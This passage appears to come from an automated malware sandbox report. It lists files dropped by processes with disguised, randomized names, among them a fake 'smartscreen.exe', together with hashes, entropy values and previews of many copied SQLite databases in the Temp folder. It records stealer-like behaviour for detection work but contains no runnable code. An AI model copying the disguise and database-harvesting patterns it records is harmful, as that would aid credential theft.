                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rCdgcwByUDmMcQzYkDZywyWr.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\jDownloader\smartscreen.exe
                                                                                                                          File Type:CSV text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):847
                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                          C:\Users\user\AppData\Local\Temp\0dbxylONwj

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\184rbzf4QA

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\1WJNMyU08j

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\2CdJ6MC9xl

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\2L69Sy8a1C

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\2QlfyHDIOj

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\2bgJOOzfDK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\2mLeQ59NzL

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\3M1EWaaPDB

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\3al3qxjHKY

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\41dDfi9786

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4E3DpAEeub

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4VaOxnltEl

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4VnBbTKUsY

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4czg2EDBcD

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4fi1PqiKl8

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4uPCLnq7AG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\6d3goDTJnw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
